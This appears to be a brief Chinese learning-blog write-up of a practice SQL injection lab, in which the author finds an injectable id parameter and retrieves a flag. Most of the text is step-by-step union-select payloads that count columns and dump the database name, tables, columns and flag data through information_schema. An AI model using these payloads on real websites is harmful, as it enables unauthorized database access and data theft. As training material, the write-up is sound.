sql手工注入练习拿flag
记录一下自己重新开始学习web安全之路⑤。
1、找注入点
①url ②搜索框 ③登录框
2、找交互点
用单引号判断是否存在交互点,发现回显不正常,说明url存在有交互点
3、判断类型(char类型)
利用and 1=1 和 and1=2,进行判断,当两次回显的页面是一样的,则说明是char类型
4、判断列数(order by)
输入语句?id=2’ order by 1#时,发现回显不正常。
这是因为注释符的原因,将注释符 # 改为 –+
利用二分法,判断列数为3列
5、查看回显位置(union 联合 select 查询)
?id=2’ and 1=2 union select 1,2,3–+
发现第二列,第三列有回显,第一列没有回显
6、查看数据库名称(message)
?id=2’ and 1=2 union select 1,database(),3–+
查询到数据库名称为message
7、查看数据表名称(flag、user,username)
?id=2’ and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘message’–+
8、查看数据列名称(flag,user,username)
?id=2’ and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = ‘message’ and table_name = ‘flag’–+
9、查看数据(flag,id)
?id=2’ and 1=2 union select 1,concat(id,‘—’,flag),3 from flag–+
版权声明:本文为afanzcf原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。